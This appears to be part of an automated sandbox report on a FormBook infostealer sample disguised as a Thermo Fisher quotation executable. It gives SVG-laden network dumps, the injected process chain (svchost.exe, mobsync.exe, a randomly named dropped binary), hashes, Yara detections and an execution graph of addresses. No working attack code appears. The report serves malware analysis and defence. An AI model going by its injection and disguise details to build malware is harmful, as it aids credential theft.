                                                            Nov 20, 2024 21:11:27.981173992 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                            Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                            Nov 20, 2024 21:11:27.981184006 CET1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                            Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                            Nov 20, 2024 21:11:27.981194973 CET1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                            Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                            Nov 20, 2024 21:11:27.981208086 CET896INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                            Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                            Nov 20, 2024 21:11:27.981218100 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                            Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                            Nov 20, 2024 21:11:27.981291056 CET224INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                            Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.9428
                                                            Nov 20, 2024 21:11:27.981317043 CET1236INData Raw: 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69
                                                            Data Ascii: 2,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541"
                                                            Nov 20, 2024 21:11:27.981466055 CET1236INData Raw: 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38
                                                            Data Ascii: "m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,5
                                                            Nov 20, 2024 21:11:27.981477976 CET1236INData Raw: 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 36 31 34 31 35 34 70 78 3b 73 74 72 6f 6b 65 2d 6c
                                                            Data Ascii: style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.4580
                                                            Nov 20, 2024 21:11:28.103071928 CET1236INData Raw: 30 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 31 36 34 2e 35 37 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 33 32 31 2e 34 32 32 32 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35
                                                            Data Ascii: 07" cy="164.5713" cx="321.42224" id="path4565" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:15:08:18
                                                            Start date:20/11/2024
                                                            Path:C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"
                                                            Imagebase:0x600000
                                                            File size:1'208'320 bytes
                                                            MD5 hash:DD888983C289F26094548B42AC5B6C85
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:15:08:19
                                                            Start date:20/11/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"
                                                            Imagebase:0x5b0000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275163756.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:15:08:34
                                                            Start date:20/11/2024
                                                            Path:C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe"
                                                            Imagebase:0x3a0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3903709621.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:5
                                                            Start time:15:08:36
                                                            Start date:20/11/2024
                                                            Path:C:\Windows\SysWOW64\mobsync.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                            Imagebase:0x690000
                                                            File size:93'696 bytes
                                                            MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:15:08:49
                                                            Start date:20/11/2024
                                                            Path:C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe"
                                                            Imagebase:0x3a0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3905763155.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:7
                                                            Start time:15:09:01
                                                            Start date:20/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff79f9e0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3.9%
                                                              Dynamic/Decrypted Code Coverage:1.5%
                                                              Signature Coverage:9.5%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:55
                                                              execution_graph 92832 64bb64 92833 64bb71 92832->92833 92834 64bb77 92832->92834 92840 621c9d 92833->92840 92836 621c9d _free 47 API calls 92834->92836 92838 64bb88 92834->92838 92836->92838 92837 621c9d _free 47 API calls 92839 64bb9a 92837->92839 92838->92837 92838->92839 92841 621ca6 RtlFreeHeap 92840->92841 92845 621ccf __dosmaperr 92840->92845 92842 621cbb 92841->92842 92841->92845 92846 627c0e 47 API calls __getptd_noexit 92842->92846 92844 621cc1 GetLastError 92844->92845 92845->92834 92846->92844 92847 60ef80 92850 613b70 92847->92850 92849 60ef8c 92851 613bc8 92850->92851 92872 6142a5 92850->92872 92852 613bef 92851->92852 92854 676fd1 92851->92854 92857 676f7e 92851->92857 92863 676f9b 92851->92863 92922 61f4ea 92852->92922 92963 65ceca 335 API calls Mailbox 92854->92963 92855 613c18 92860 61f4ea 48 API calls 92855->92860 92857->92852 92858 676f87 92857->92858 92960 65d552 335 API calls Mailbox 92858->92960 92859 676fbe 92962 64cc5c 86 API calls 4 library calls 92859->92962 92897 613c2c _memcpy_s __wsetenvp 92860->92897 92863->92859 92961 65da0e 335 API calls 2 library calls 92863->92961 92864 6142f2 92993 64cc5c 86 API calls 4 library calls 92864->92993 92867 6773b0 92867->92849 92868 67737a 92992 64cc5c 86 API calls 4 library calls 92868->92992 92869 677297 92982 64cc5c 86 API calls 4 library calls 92869->92982 92986 64cc5c 86 API calls 4 library calls 92872->92986 92874 67707e 92964 64cc5c 86 API calls 4 library calls 92874->92964 92876 6140df 92983 64cc5c 86 API calls 4 library calls 92876->92983 92881 61dce0 53 API calls 92881->92897 92882 60d645 53 API calls 92882->92897 92885 6772d2 92984 64cc5c 86 API calls 4 library calls 92885->92984 92886 60fe30 335 API calls 92886->92897 92888 677350 92990 64cc5c 86 API calls 4 library calls 92888->92990 92890 677363 92991 64cc5c 86 API calls 4 library calls 92890->92991 92892 6772e9 92985 64cc5c 86 API calls 4 library calls 92892->92985 92897->92864 92897->92868 92897->92869 92897->92872 92897->92874 92897->92876 92897->92881 92897->92882 92897->92885 92897->92886 92897->92888 92897->92890 92897->92892 92898 67714c 92897->92898 92899 60d286 48 API calls 92897->92899 92900 61f4ea 48 API calls 92897->92900 92903 67733f 92897->92903 92904 613f2b 92897->92904 92905 606eed 48 API calls 92897->92905 92909 6771e1 92897->92909 92931 60d9a0 53 API calls __cinit 92897->92931 92932 60d83d 53 API calls 92897->92932 92933 61ee75 92897->92933 92942 60cdb9 48 API calls 92897->92942 92943 60d6e9 92897->92943 92947 61c15c 48 API calls 92897->92947 92948 61c050 92897->92948 92959 61becb 335 API calls 92897->92959 92965 60dcae 50 API calls Mailbox 92897->92965 92966 65ccdc 48 API calls 92897->92966 92967 64a1eb 50 API calls 92897->92967 92968 606a63 92897->92968 92979 65ccdc 48 API calls 92898->92979 92899->92897 92900->92897 92989 64cc5c 86 API calls 4 library calls 92903->92989 92904->92849 92905->92897 92908 6771a1 92981 61c15c 48 API calls 92908->92981 92909->92904 92988 64cc5c 86 API calls 4 library calls 92909->92988 92910 67715f 92910->92908 92980 65ccdc 48 API calls 92910->92980 92916 6771ce 92917 61c050 48 API calls 92916->92917 92919 6771d6 92917->92919 92918 6771ab 92918->92872 92918->92916 92919->92909 92920 677313 92919->92920 92987 64cc5c 86 API calls 4 library calls 92920->92987 92925 61f4f2 __calloc_impl 92922->92925 92924 61f50c 92924->92855 92925->92924 92926 61f50e std::exception::exception 92925->92926 92994 62395c 92925->92994 93008 626805 RaiseException 92926->93008 92928 61f538 93009 62673b 47 API calls _free 92928->93009 92930 61f54a 92930->92855 92931->92897 92932->92897 92935 61f4ea __calloc_impl 92933->92935 92934 62395c std::exception::_Copy_str 47 API calls 92934->92935 92935->92934 92936 61f50c 92935->92936 92937 61f50e std::exception::exception 92935->92937 92936->92897 93016 626805 RaiseException 92937->93016 92939 61f538 93017 62673b 47 API calls _free 92939->93017 92941 61f54a 92941->92897 92942->92897 92944 60d6f4 92943->92944 92945 60d71b 92944->92945 93018 60d764 55 API calls 92944->93018 92945->92897 92947->92897 92949 61c064 92948->92949 92951 61c069 Mailbox 92948->92951 93019 61c1af 48 API calls 92949->93019 92956 61c077 92951->92956 93020 61c15c 48 API calls 92951->93020 92953 61f4ea 48 API calls 92955 61c108 92953->92955 92954 61c152 92954->92897 92957 61f4ea 48 API calls 92955->92957 92956->92953 92956->92954 92958 61c113 92957->92958 92958->92897 92958->92958 92959->92897 92960->92904 92961->92859 92962->92854 92963->92897 92964->92904 92965->92897 92966->92897 92967->92897 92969 606adf 92968->92969 92971 606a6f __wsetenvp 92968->92971 93025 60b18b 92969->93025 92972 606ad7 92971->92972 92973 606a8b 92971->92973 93024 60c369 48 API calls 92972->93024 93021 606b4a 92973->93021 92976 606a95 92978 61ee75 48 API calls 92976->92978 92977 606ab6 _memcpy_s 92977->92897 92978->92977 92979->92910 92980->92910 92981->92918 92982->92876 92983->92904 92984->92892 92985->92904 92986->92904 92987->92904 92988->92904 92989->92904 92990->92904 92991->92904 92992->92904 92993->92867 92995 6239d7 __calloc_impl 92994->92995 93001 623968 __calloc_impl 92994->93001 93015 627c0e 47 API calls __getptd_noexit 92995->93015 92998 62399b RtlAllocateHeap 92998->93001 93007 6239cf 92998->93007 93000 6239c3 93013 627c0e 47 API calls __getptd_noexit 93000->93013 93001->92998 93001->93000 93004 623973 93001->93004 93005 6239c1 93001->93005 93004->93001 93010 6281c2 47 API calls 2 library calls 93004->93010 93011 62821f 47 API calls 8 library calls 93004->93011 93012 621145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93004->93012 93014 627c0e 47 API calls __getptd_noexit 93005->93014 93007->92925 93008->92928 93009->92930 93010->93004 93011->93004 93013->93005 93014->93007 93015->93007 93016->92939 93017->92941 93018->92945 93019->92951 93020->92956 93022 61f4ea 48 API calls 93021->93022 93023 606b54 93022->93023 93023->92976 93024->92977 93026 60b199 93025->93026 93028 60b1a2 _memcpy_s 93025->93028 93026->93028 93029 60bdfa 93026->93029 93028->92977 93030 60be0a _memcpy_s 93029->93030 93031 60be0d 93029->93031 93030->93028 93032 61f4ea 48 API calls 93031->93032 93033 60be17 93032->93033 93034 61ee75 48 API calls 93033->93034 93034->93030 93035 679c06 93046 61d3be 93035->93046 93037 679c1c 93045 679c91 Mailbox 93037->93045 93128 601caa 49 API calls 93037->93128 93040 679cc5 93042 67a7ab Mailbox 93040->93042 93130 64cc5c 86 API calls 4 library calls 93040->93130 93043 679c71 93043->93040 93129 64b171 48 API calls 93043->93129 93055 613200 93045->93055 93047 61d3ca 93046->93047 93048 61d3dc 93046->93048 93131 60dcae 50 API calls Mailbox 93047->93131 93049 61d3e2 93048->93049 93050 61d40b 93048->93050 93052 61f4ea 48 API calls 93049->93052 93132 60dcae 50 API calls Mailbox 93050->93132 93054 61d3d4 93052->93054 93054->93037 93133 60bd30 93055->93133 93057 613267 93059 6132f8 93057->93059 93060 67907a 93057->93060 93118 613628 93057->93118 93206 61c36b 86 API calls 93059->93206 93241 64cc5c 86 API calls 4 library calls 93060->93241 93061 679072 93061->93040 93065 613313 93116 6134eb _memcpy_s Mailbox 93065->93116 93065->93118 93122 6794df 93065->93122 93138 602b7a 93065->93138 93066 6791fa 93256 64cc5c 86 API calls 4 library calls 93066->93256 93070 67909a 93070->93066 93242 60d645 93070->93242 93071 6793c5 93073 60fe30 335 API calls 93071->93073 93072 67926d 93260 64cc5c 86 API calls 4 library calls 93072->93260 93076 679407 93073->93076 93084 60d6e9 55 API calls 93076->93084 93076->93118 93079 679114 93093 679128 93079->93093 93102 679152 93079->93102 93080 679220 93257 601caa 49 API calls 93080->93257 93082 6133ce 93087 613465 93082->93087 93088 67945e 93082->93088 93082->93116 93090 679438 93084->93090 93089 61f4ea 48 API calls 93087->93089 93266 64c942 50 API calls 93088->93266 93105 61346c 93089->93105 93265 64cc5c 86 API calls 4 library calls 93090->93265 93091 67923d 93095 679252 93091->93095 93096 67925e 93091->93096 93252 64cc5c 86 API calls 4 library calls 93093->93252 93258 64cc5c 86 API calls 4 library calls 93095->93258 93259 64cc5c 86 API calls 4 library calls 93096->93259 93098 61c3c3 48 API calls 93098->93116 93103 679177 93102->93103 93107 679195 93102->93107 93253 65f320 335 API calls 93103->93253 93112 61351f 93105->93112 93145 60e8d0 93105->93145 93108 67918b 93107->93108 93254 65f5ee 335 API calls 93107->93254 93108->93118 93255 61c2d6 48 API calls _memcpy_s 93108->93255 93110 61f4ea 48 API calls 93110->93116 93115 613540 93112->93115 93267 606eed 93112->93267 93115->93118 93121 6794b0 93115->93121 93124 613585 93115->93124 93116->93070 93116->93071 93116->93072 93116->93090 93116->93098 93116->93110 93116->93112 93117 679394 93116->93117 93116->93118 93208 60d9a0 53 API calls __cinit 93116->93208 93209 60d8c0 53 API calls 93116->93209 93210 61c2d6 48 API calls _memcpy_s 93116->93210 93211 60fe30 93116->93211 93261 65cda2 82 API calls Mailbox 93116->93261 93262 6480e3 53 API calls 93116->93262 93263 60d764 55 API calls 93116->93263 93264 60dcae 50 API calls Mailbox 93116->93264 93120 61f4ea 48 API calls 93117->93120 93127 613635 Mailbox 93118->93127 93240 64cc5c 86 API calls 4 library calls 93118->93240 93120->93071 93271 60dcae 50 API calls Mailbox 93121->93271 93122->93118 93272 64cc5c 86 API calls 4 library calls 93122->93272 93124->93118 93124->93122 93125 613615 93124->93125 93207 60dcae 50 API calls Mailbox 93125->93207 93127->93040 93128->93043 93129->93045 93130->93042 93131->93054 93132->93054 93134 60bd3f 93133->93134 93137 60bd5a 93133->93137 93135 60bdfa 48 API calls 93134->93135 93136 60bd47 CharUpperBuffW 93135->93136 93136->93137 93137->93057 93139 602b8b 93138->93139 93140 67436a 93138->93140 93141 61f4ea 48 API calls 93139->93141 93142 602b92 93141->93142 93143 602bb3 93142->93143 93273 602bce 48 API calls 93142->93273 93143->93082 93146 60e8f6 93145->93146 93170 60e906 Mailbox 93145->93170 93147 60ed52 93146->93147 93146->93170 93374 61e3cd 335 API calls 93147->93374 93148 64cc5c 86 API calls 93148->93170 93149 60ebc7 93151 60ebdd 93149->93151 93375 602ff6 16 API calls 93149->93375 93151->93116 93153 60ed63 93153->93151 93155 60ed70 93153->93155 93154 60e94c PeekMessageW 93154->93170 93376 61e312 335 API calls Mailbox 93155->93376 93157 60ed77 LockWindowUpdate DestroyWindow GetMessageW 93157->93151 93159 60eda9 93157->93159 93158 67526e Sleep 93158->93170 93161 6759ef TranslateMessage DispatchMessageW GetMessageW 93159->93161 93161->93161 93163 675a1f 93161->93163 93163->93151 93164 60ed21 PeekMessageW 93164->93170 93165 601caa 49 API calls 93165->93170 93166 60ebf7 timeGetTime 93166->93170 93168 61f4ea 48 API calls 93168->93170 93169 606eed 48 API calls 93169->93170 93170->93148 93170->93149 93170->93154 93170->93158 93170->93164 93170->93165 93170->93166 93170->93168 93170->93169 93171 60ed3a TranslateMessage DispatchMessageW 93170->93171 93172 675557 WaitForSingleObject 93170->93172 93175 67588f Sleep 93170->93175 93176 60edae timeGetTime 93170->93176 93179 675733 Sleep 93170->93179 93182 602aae 311 API calls 93170->93182 93187 675445 Sleep 93170->93187 93197 60fe30 311 API calls 93170->93197 93200 613200 311 API calls 93170->93200 93201 675429 Mailbox 93170->93201 93204 60ce19 48 API calls 93170->93204 93205 60d6e9 55 API calls 93170->93205 93274 60ef00 93170->93274 93281 60f110 93170->93281 93346 6145e0 93170->93346 93363 61e244 93170->93363 93368 61dc5f 93170->93368 93373 60eed0 335 API calls Mailbox 93170->93373 93378 668d23 48 API calls 93170->93378 93171->93164 93172->93170 93173 675574 GetExitCodeProcess CloseHandle 93172->93173 93173->93170 93175->93201 93377 601caa 49 API calls 93176->93377 93179->93201 93181 675926 GetExitCodeProcess 93185 675952 CloseHandle 93181->93185 93186 67593c WaitForSingleObject 93181->93186 93182->93170 93184 61dc38 timeGetTime 93184->93201 93185->93201 93186->93170 93186->93185 93187->93170 93188 675432 Sleep 93188->93187 93189 668c4b 108 API calls 93189->93201 93190 602c79 107 API calls 93190->93201 93192 6759ae Sleep 93192->93170 93197->93170 93198 60d6e9 55 API calls 93198->93201 93200->93170 93201->93170 93201->93181 93201->93184 93201->93187 93201->93188 93201->93189 93201->93190 93201->93192 93201->93198 93379 60d7f7 93201->93379 93384 644cbe 49 API calls Mailbox 93201->93384 93385 601caa 49 API calls 93201->93385 93386 60ce19 93201->93386 93392 602aae 335 API calls 93201->93392 93393 65ccb2 50 API calls 93201->93393 93394 647a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93201->93394 93395 646532 63 API calls 3 library calls 93201->93395 93204->93170 93205->93170 93206->93065 93207->93118 93208->93116 93209->93116 93210->93116 93212 60fe50 93211->93212 93234 60fe7e 93211->93234 93213 61f4ea 48 API calls 93212->93213 93213->93234 93214 61146e 93215 606eed 48 API calls 93214->93215 93230 60ffe1 93215->93230 93216 6115b5 94306 64cc5c 86 API calls 4 library calls 93216->94306 93217 610509 94308 64cc5c 86 API calls 4 library calls 93217->94308 93220 606eed 48 API calls 93220->93234 93221 61f4ea 48 API calls 93221->93234 93223 67a246 93227 606eed 48 API calls 93223->93227 93224 67a922 93224->93116 93225 611473 94307 64cc5c 86 API calls 4 library calls 93225->94307 93227->93230 93229 67a873 93229->93116 93230->93116 93231 60d7f7 48 API calls 93231->93234 93232 6397ed InterlockedDecrement 93232->93234 93233 67a30e 93233->93230 94305 6397ed InterlockedDecrement 93233->94305 93234->93214 93234->93216 93234->93217 93234->93220 93234->93221 93234->93223 93234->93225 93234->93230 93234->93231 93234->93232 93234->93233 93235 620f0a 52 API calls __cinit 93234->93235 93237 67a973 93234->93237 94303 611820 335 API calls 2 library calls 93234->94303 94304 611d10 59 API calls Mailbox 93234->94304 93235->93234 94309 64cc5c 86 API calls 4 library calls 93237->94309 93239 67a982 93240->93061 93241->93065 93243 60d654 93242->93243 93251 60d67e 93242->93251 93244 60d65b 93243->93244 93247 60d6c2 93243->93247 93245 60d6ab 93244->93245 93246 60d666 93244->93246 93245->93251 94311 61dce0 53 API calls 93245->94311 94310 60d9a0 53 API calls __cinit 93246->94310 93247->93245 94312 61dce0 53 API calls 93247->94312 93251->93079 93251->93080 93252->93118 93253->93108 93254->93108 93255->93066 93256->93118 93257->93091 93258->93118 93259->93118 93260->93118 93261->93116 93262->93116 93263->93116 93264->93116 93265->93118 93266->93112 93268 606f00 93267->93268 93269 606ef8 93267->93269 93268->93115 94313 60dd47 48 API calls _memcpy_s 93269->94313 93271->93122 93272->93118 93273->93143 93275 60ef1d 93274->93275 93277 60ef2f 93274->93277 93396 60e3b0 335 API calls 2 library calls 93275->93396 93397 64cc5c 86 API calls 4 library calls 93277->93397 93279 60ef26 93279->93170 93280 6786f9 93280->93280 93282 60f130 93281->93282 93284 60fe30 335 API calls 93282->93284 93288 60f199 93282->93288 93283 60f3dd 93287 6787c8 93283->93287 93295 60f3f2 93283->93295 93331 60f431 Mailbox 93283->93331 93286 678728 93284->93286 93285 60f595 93292 60d7f7 48 API calls 93285->93292 93285->93331 93286->93288 93415 64cc5c 86 API calls 4 library calls 93286->93415 93418 64cc5c 86 API calls 4 library calls 93287->93418 93288->93283 93288->93285 93294 60d7f7 48 API calls 93288->93294 93326 60f229 93288->93326 93289 60fe30 335 API calls 93289->93331 93293 6787a3 93292->93293 93417 620f0a 52 API calls __cinit 93293->93417 93297 678772 93294->93297 93309 60f418 93295->93309 93419 649af1 48 API calls 93295->93419 93296 678b1b 93312 678bcf 93296->93312 93313 678b2c 93296->93313 93416 620f0a 52 API calls __cinit 93297->93416 93298 64cc5c 86 API calls 93298->93331 93301 60f770 93308 678a45 93301->93308 93323 60f77a 93301->93323 93303 60d6e9 55 API calls 93303->93331 93304 678810 93420 65eef8 335 API calls 93304->93420 93305 60fe30 335 API calls 93325 60f6aa 93305->93325 93306 678b7e 93431 65e40a 335 API calls Mailbox 93306->93431 93307 678c53 93436 64cc5c 86 API calls 4 library calls 93307->93436 93428 61c1af 48 API calls 93308->93428 93309->93296 93309->93325 93309->93331 93433 64cc5c 86 API calls 4 library calls 93312->93433 93430 65f5ee 335 API calls 93313->93430 93314 678beb 93434 65bdbd 335 API calls Mailbox 93314->93434 93319 611b90 48 API calls 93319->93331 93398 611b90 93323->93398 93324 678c00 93345 60f537 Mailbox 93324->93345 93435 64cc5c 86 API calls 4 library calls 93324->93435 93325->93301 93325->93305 93328 60fce0 93325->93328 93325->93331 93325->93345 93326->93283 93326->93285 93326->93309 93326->93331 93327 678823 93327->93309 93330 67884b 93327->93330 93328->93345 93432 64cc5c 86 API calls 4 library calls 93328->93432 93421 65ccdc 48 API calls 93330->93421 93331->93289 93331->93298 93331->93303 93331->93306 93331->93307 93331->93314 93331->93319 93331->93328 93331->93345 93414 60dd47 48 API calls _memcpy_s 93331->93414 93429 6397ed InterlockedDecrement 93331->93429 93437 61c1af 48 API calls 93331->93437 93335 678857 93337 678865 93335->93337 93338 6788aa 93335->93338 93422 649b72 48 API calls 93337->93422 93341 6788a0 Mailbox 93338->93341 93423 64a69d 48 API calls 93338->93423 93339 60fe30 335 API calls 93339->93345 93341->93339 93343 6788e7 93424 60bc74 93343->93424 93345->93170 93347 614637 93346->93347 93348 61479f 93346->93348 93349 